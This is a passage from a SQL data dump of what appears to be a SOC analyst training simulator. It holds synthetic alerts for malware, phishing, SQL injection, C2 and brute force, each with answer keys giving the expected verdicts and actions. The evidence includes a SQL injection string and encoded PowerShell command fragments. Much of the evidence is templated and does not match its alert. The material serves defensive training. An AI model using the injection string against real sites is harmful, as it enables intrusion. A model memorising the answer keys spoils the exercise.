2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(949, 'Malware Detected via EDR', 'critical', 'CrowdStrike', 'Malicious file execution detected with a known malware hash.', 'Malware', 'T1059', 1, 'closed', 129, '{\"timestamp\":\"2026-01-16T11:11:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"hostname\":\"desktop02\",\"command_line\":\"C:\\\\malware\\\\evil.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-01-16 13:12:47', '2026-02-14 22:55:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected with 75 antivirus engines marking as malware.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\evil.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Suspicious file execution on internal network.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware, confirming the alert as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(950, 'Phishing Email Detected', 'high', 'Proofpoint', 'A phishing email containing a malicious link was received by the user.', 'Phishing', 'T1566', 1, 'Closed', 74, '{\"timestamp\":\"2026-01-16T09:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.5\",\"username\":\"asmith\",\"email_sender\":\"phisher@maliciousdomain.com\",\"url\":\"http://maliciousdomain.com/stealinfo\"}', '2026-01-16 13:12:47', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/stealinfo\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for hosting phishing content.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known phishing URL, confirming the malicious intent.\"}', 'Novice', 'CORE', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.636Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(951, 'SQL Injection Attempt Detected', 'high', 'Wazuh', 'A SQL injection payload was detected in a web request.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T12:45:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.20\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://victimsite.com/login\"}', '2026-01-16 13:12:47', '2026-02-11 14:00:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous SQL injection attempts\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL injection payload is a common attack vector, confirming it as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(952, 'C2 Communication Attempt Detected', 'critical', 'Firewall', 'Attempted communication with a known Command and Control server detected.', 'Malware', 'T1071', 1, 'Closed', 85, '{\"timestamp\":\"2026-01-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"server01\",\"domain\":\"maliciousc2.com\"}', '2026-01-16 13:12:47', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting C2 servers\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousc2.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain linked to C2 activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection attempt to a known C2 server confirms malicious activity.\"}', 'Novice', 'NDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(953, 'Failed Login Attempts from Internal Source', 'low', 'SIEM', 'Multiple failed login attempts detected from an internal IP address.', 'Brute Force', 'T1110', 0, 'closed', 159, '{\"timestamp\":\"2026-01-16T08:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.10\",\"username\":\"bsmith\",\"hostname\":\"laptop03\",\"failed_attempts\":5}', '2026-01-16 13:12:47', '2026-02-18 09:08:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"bsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts are from an internal IP and appear to be benign activity.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:31:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:30:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:29:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:28:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(954, 'Script-Based Malware Detected', 'high', 'CrowdStrike', 'Execution of a script-based malware detected on a workstation.', 'Malware', 'T1059', 1, 'investigating', 145, '{\"timestamp\":\"2026-01-16T15:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"hostname\":\"workstation04\",\"command_line\":\"powershell -NoP -NonI -Exec Bypass -Enc ZQB4AGkAdAAgAC0AbwBuACA\"}', '2026-01-16 13:12:47', '2026-02-14 09:40:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell -NoP -NonI -Exec Bypass -Enc ZQB4AGkAdAAgAC0AbwBuACA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded command indicates malicious script execution\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands indicates malicious script execution.\"}', 'Novice', 'EDR', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(955, 'Suspicious Domain Access Detected', 'medium', 'Firewall', 'A request to a suspicious domain was made by a user on the internal network.', 'Web Request', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-16T13:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.60\",\"hostname\":\"laptop05\",\"domain\":\"unknown-domain.com\"}', '2026-01-16 13:12:47', '2026-02-16 17:36:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"unknown-domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered and lacks reputation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain is new and lacks reputation but does not show malicious activity.\"}', 'Novice', 'CORE', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(956, 'Phishing Email with Suspicious Attachment', 'high', 'Proofpoint', 'A phishing email with a suspicious attachment was received.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T16:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.99\",\"username\":\"mjohnson\",\"email_sender\":\"fakebank@fraudulent.com\",\"filename\":\"invoice.pdf\"}', '2026-01-16 13:12:47', '2026-02-11 13:59:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"fakebank@fraudulent.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Attachment known to contain malicious macros\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known malicious attachment, confirming phishing intent.\"}', 'Novice', 'CORE', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Suspicious Attachment\",\"date\":\"2026-02-01T20:32:22.642Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(957, 'Unauthorized Access Attempt Detected', 'medium', 'IDS/IPS', 'An unauthorized access attempt to a sensitive system was detected from an external IP.', 'Credential Attack', 'T1078', 1, 'Closed', 141, '{\"timestamp\":\"2026-01-16T17:55:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"secure-server\"}', '2026-01-16 13:12:47', '2026-02-12 04:25:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access attempt from a malicious IP to a sensitive system confirms the attack.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(958, 'External IP Port Scanning Detected', 'medium', 'Firewall', 'Port scanning activity detected from an external IP address.', 'Reconnaissance', 'T1046', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.1.0/24\",\"hostname\":\"null\"}', '2026-01-16 13:12:47', '2026-02-16 17:17:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently reported for port scanning activities\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"reconnaissance\",\"analysis_notes\":\"The IP\'s history of port scanning confirms malicious reconnaissance activity.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(959, 'Benign User Behavior Mistaken as Anomalous', 'low', 'SIEM', 'Anomalous user behavior detected, but investigated and determined to be a benign anomaly.', 'Anomaly', 'T1087', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T19:10:00Z\",\"event_type\":\"user_behavior\",\"src_ip\":\"192.168.1.30\",\"username\":\"csmith\",\"hostname\":\"desktop06\",\"activity\":\"accessed large number of files\"}', '2026-01-16 13:12:47', '2026-02-15 05:05:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"csmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user with no history of malicious activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The activity was investigated and found to be normal work behavior.\"}', 'Novice', 'CORE', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 